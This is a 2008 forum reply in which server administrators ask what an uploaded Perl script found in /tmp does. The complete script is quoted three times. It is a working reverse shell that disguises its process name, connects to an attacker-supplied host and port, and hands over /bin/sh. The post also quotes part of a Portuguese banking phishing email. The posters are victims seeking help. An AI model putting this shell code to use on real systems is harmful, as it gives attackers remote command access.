Thread: Hacking Perl Script
View Single Post
  #7 (permalink)  
Old 10-08-2008, 09:31 AM
psousa psousa is offline
Newbie
  
Join Date: Oct 2008
Posts: 1
Rep Power: 0
psousa is on a distinguished road
Default Re: Hacking Perl Script
Quote:
Originally Posted by falco85 View Post
I was looking through my log files and happened by a file upload that should not have been uploaded (through a script somehow they managed to upload although they shouldn't have access). I then immediatly went to the directory the script was inserted into "/tmp" and opened the file. The first line reads #!/usr/bin/perl and even though I have used perl before I still don't entirely understand what this script does.

Perl Code:
  1. #!/usr/bin/perl
  2. use Socket;
  3. $cmd= "lynx";
  4. $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
  5. $0=$cmd;
  6. $target=$ARGV[0];
  7. $port=$ARGV[1];
  8. $iaddr=inet_aton($target) || die("Error: $!\n");
  9. $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
  10. $proto=getprotobyname('tcp');
  11. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  12. connect(SOCKET, $paddr) || die("Error: $!\n");
  13. open(STDIN, ">&SOCKET");
  14. open(STDOUT, ">&SOCKET");
  15. open(STDERR, ">&SOCKET");
  16. system($system);
  17. close(STDIN);
  18. close(STDOUT);
  19. close(STDERR);

I can see that it opens lynx and connects to the local machine but what does this do:

Perl Code:
  1. $system= 'echo "`uname -a`";echo "`id`";/bin/sh';

I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:

Perl Code:
  1. $target=$ARGV[0];
  2. $port=$ARGV[1];
  3. $iaddr=inet_aton($target) || die("Error: $!\n");
  4. $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
  5. $proto=getprotobyname('tcp');
  6. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  7. connect(SOCKET, $paddr) || die("Error: $!\n");
  8. open(STDIN, ">&SOCKET");
  9. open(STDOUT, ">&SOCKET");
  10. open(STDERR, ">&SOCKET");
  11. system($system);
  12. close(STDIN);
  13. close(STDOUT);
  14. close(STDERR);

Can someone help me figure out what the intention of this script is?
Same issue here. Do you have any news on this issue?

My details:


Hello.

Today I found a /tmp script (/tmp/back).
I have APF firewall and anti-DoS, secured tmp's and modsecurity2 on apache2 running gotroot rules.

How can it is possible to write a perl file on /tmp? File has not run permitions, but is a Perl file, so I think they ran it. I found this script after someone to send mail bomb through the server (about 9000 each time).

Server simptoms:
several connections from my server to ftp.hosteurope.de
several phishing emails being sent over my server

Script code:
Quote:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Email Bazilian content:
Quote:
(...) Estamos fazendo atualizações críticas em nossos servidores, por esse motivo é necessário o recadastro de seus dados cadastrais para ter acesso a todos os serviços do Internet Banking Caixa.
Para realizar a atualização, basta baixar o programa de atualização da Caixa que segue link abaixo. (...)
How can server possible be compromised?

Any help will be appreciated.

Regards.
Reply With Quote